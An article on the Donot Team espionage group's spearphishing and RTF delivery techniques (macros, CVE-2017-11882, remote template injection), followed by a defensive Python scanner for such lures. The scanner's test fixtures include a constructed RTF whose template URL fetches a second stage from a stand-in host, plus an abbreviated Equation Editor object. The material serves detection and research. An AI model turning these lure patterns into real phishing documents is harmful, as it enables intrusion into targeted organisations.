Donot Team, also known as APT-C-35, has been targeting South Asian organisations and individuals since 2016. Amnesty International reported that the group's malware is linked to an Indian cybersecurity company that offers hacker-for-hire services to governments.
Researchers at ESET have consistently tracked several Windows malware campaigns built on the group's yty malware framework, which is used to collect and exfiltrate data, over the past two years. In the recent campaigns they also found the DarkMusical and Gedit malware. Most of the campaigns are motivated by espionage.
The Donot Team's attacks focus on:
- Military and Government Organisations
- Ministries of Foreign Affairs
According to ESET telemetry, Donot has targeted the same entities consistently, sending spearphishing emails with malicious attachments every four months. Notably, there were no signs of spoofed sender addresses, which suggests the attackers were sending from compromised email accounts: some of the accounts or email servers of the targeted organisations may have been compromised in earlier campaigns.
Some APT operators regain access to a previously compromised network by deploying a stealthy backdoor before leaving it; others return with new malware or a new variant of old malware. In Donot's case, the group is persistent in regaining access.
The attackers deliver malicious Microsoft Office documents through spearphishing emails to deploy their malware. Researchers at ESET observed three techniques used by the Donot Team:
- Macros in Word, Excel or PowerPoint documents
(Malicious macro in a PowerPoint document that drops a downloader executable and creates a scheduled task to run it)
- Exploiting the Equation Editor memory corruption vulnerability CVE-2017-11882 with RTF files carrying a .doc extension. Beyond opening the file, this technique requires no user interaction: the exploit runs shellcode that deploys the main components of the malware.
(CLSID of the COM object used by the RTF document to load the Equation Editor; the ensuing OLE object contains the CVE-2017-11882 exploit)
(The OLE object headers of the DLLs also embedded in the RTF document)
- RTF template injection is the third technique: it makes Word download an RTF document from a remote server when the lure is opened. To achieve this, a URL is placed in the `\*\template` control word of the RTF file instead of the path to a local template file. Donot uses this to fetch another document that exploits CVE-2017-11882, which is loaded automatically once it is downloaded.
ESET has released complete documentation of this malware, covering the exploitation frameworks, methods and code used by the Donot Team.
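The two RTF-based techniques above (an Equation Editor object for CVE-2017-11882 inside an RTF renamed to .doc, and a remote URL in the `\*\template` destination) leave static artefacts that a mail gateway or triage script can flag without opening the file. The following is an added example written for this page, not ESET's or Donot's code: a small Python triage routine that checks whether a file is really RTF despite its extension, extracts any `\*\template` URL, and looks for an Equation Editor object either by `\objclass` or by the Equation Editor 3.0 CLSID (the documented value {0002CE02-0000-0000-C000-000000000046}) inside hex-encoded `\objdata`. The sample documents, filenames and the 203.0.113.x URL are constructed for the example; the `\objdata` blob is abbreviated and not a working exploit.

```python
"""Static triage of RTF lures for the delivery tricks described above.

Added example (not ESET's or Donot Team's code). All sample files below are
constructed; only the Equation Editor CLSID is a real, documented value.
"""
import re

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046}.
# Inside hex-encoded \objdata the GUID appears in its little-endian on-disk
# form, so the first three fields are byte-swapped.
EQNEDT_CLSID_LE_HEX = b"02ce020000000000c000000000000046"

RTF_MAGIC = b"{\\rt"  # Word accepts {\rtf1 and the truncated {\rt header

TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^}]*)\}", re.I)
OBJCLASS_RE = re.compile(rb"\\objclass\s+([A-Za-z0-9._]+)", re.I)
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)", re.I)
URL_RE = re.compile(rb"https?://[^\s\"}]+", re.I)


def is_rtf(data: bytes) -> bool:
    """True if the bytes carry an RTF header, whatever the file extension."""
    return data.lstrip().startswith(RTF_MAGIC)


def scan_rtf(filename: str, data: bytes) -> list:
    """Return a list of finding strings for one file (empty if clean/non-RTF)."""
    findings = []
    if not is_rtf(data):
        return findings

    # Technique 2: RTF content delivered under a .doc (or other) extension.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext != "rtf":
        findings.append(f"rtf-masquerade: RTF content with extension '.{ext}'")

    # Technique 3: remote URL in the \*\template destination.
    for m in TEMPLATE_RE.finditer(data):
        url = URL_RE.search(m.group(1))
        if url:
            findings.append("template-injection: " + url.group(0).decode())

    # Technique 2: embedded Equation Editor object (CVE-2017-11882 vector),
    # by declared object class ...
    for m in OBJCLASS_RE.finditer(data):
        cls = m.group(1).decode()
        if cls.lower().startswith("equation"):
            findings.append("equation-editor-object: objclass " + cls)

    # ... or by the Equation Editor CLSID inside the hex-encoded object data,
    # which catches lures that omit or mangle \objclass.
    for m in OBJDATA_RE.finditer(data):
        hexblob = re.sub(rb"\s+", b"", m.group(1)).lower()
        if EQNEDT_CLSID_LE_HEX in hexblob:
            findings.append("equation-editor-object: CLSID 0002CE02-0000-0000-C000-000000000046 in objdata")

    return findings


# Constructed sample files (not real lures). 203.0.113.0/24 is a documentation range.
SAMPLES = {
    # RTF with .doc extension and a remote template URL
    "invoice.doc": b"{\\rtf1\\ansi{\\*\\template \"http://203.0.113.10/stage2.rtf\"}\\par Hello}",
    # RTF with .doc extension embedding an Equation.3 object; objdata is
    # abbreviated: OLE1 header, "Equation.3" in ASCII, CFB magic, CLSID
    "report.doc": (b"{\\rtf1{\\object\\objemb\\objclass Equation.3{\\*\\objdata "
                   b"01050000020000000b0000004571756174696f6e2e330000000000000000"
                   b"00000000 d0cf11e0a1b11ae1 02CE020000000000C000000000000046 }}}"),
    # Benign RTF with the right extension
    "notes.rtf": b"{\\rtf1\\ansi\\deff0 {\\fonttbl{\\f0 Calibri;}} plain text\\par}",
    # Genuine legacy binary .doc (CFB magic), out of scope for this scanner
    "memo.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1 legacy binary doc",
}


def triage_all(samples: dict = None) -> dict:
    """Scan every sample and map filename -> findings."""
    samples = SAMPLES if samples is None else samples
    return {name: scan_rtf(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, hits in triage_all().items():
        print(name, "->", hits or "clean")
```

In production the same checks belong in front of the mail store rather than at the endpoint: the template URL is the only network indicator the lure exposes before Word fetches the second stage, and an RTF header under a .doc extension is by itself enough reason to quarantine an attachment from an otherwise trusted sender, which matters here because the page notes Donot sends from accounts that are not spoofed.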